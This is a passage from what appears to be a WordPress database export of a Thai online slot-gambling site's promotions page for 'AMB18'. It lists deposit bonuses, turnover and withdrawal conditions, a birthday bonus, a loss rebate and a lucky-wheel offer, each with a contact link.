data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp\" alt=\"HBD Bonus\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp\" alt=\"Reward 10\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp\" alt=\"lucky wheel\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ </strong><b>AMB18 </b>เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><b>AMB18 ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</b> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-26 19:25:56','2026-02-26 19:25:56','',27,'https://amb18slot.com/?p=407',0,'revision','',0),(408,3,'2026-02-26 19:25:56','2026-02-26 19:25:56','<h1>โปรโมชั่น AMB18 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นตัวตึงจาก AMB18 จัดเต็มเพื่อสายสล็อตตัวจริงกับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มพลังให้สนุกได้ตั้งแต่ก้าวแรกเติมไม่ต้องหนักก็มีสิทธิ์ลุ้นมันส์ได้เหมือนกัน แถมเงื่อนไขถอนไม่อั้น เล่นได้แบบไม่ต้องกั๊กรองรับครบทั้งสมาชิกใหม่และสมาชิกปัจจุบันใครอยู่ทีมไหนก็เข้าร่วมได้หมดรวมโปรสล็อตมาให้แบบจุก ๆ ทั้งโบนัสฝากครั้งแรก โบนัสฝากประจำ โปรคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาลที่สลับมาให้ร่วมสนุกตลอดปีอัปเดตใหม่เรื่อย ๆ ไม่มีเอาต์ ช่วยให้ทุกยอดเดิมพันดูคุ้มขึ้นแบบเห็นชัด เรื่องระบบก็หายห่วงเพราะฝากถอนอัตโนมัติทำรายการไวแบบไม่ต้องรอนาน ปลอดภัย มั่นใจได้ รองรับธนาคารชั้นนำ ใช้งานง่ายบนออนไลน์ ตอบโจทย์สายเอ็นเตอร์เทนที่อยากได้ทั้งความตื่นเต้นและความสะดวกในที่เดียว แต่ถึงโปรจะปังแค่ไหนก็อย่าลืมเล่นแบบมีสติวางแผนการเงินทุกครั้งก่อนเริ่มเดิมพัน และเปิดให้บริการสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อให้ความสนุกมาคู่กับความรับผิดชอบและความปลอดภัยแบบจริงจัง</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18.webp\" alt=\"โปรโมชั่น\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Banner-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Lucky-wheel-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ </strong><b>AMB18 </b>เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" 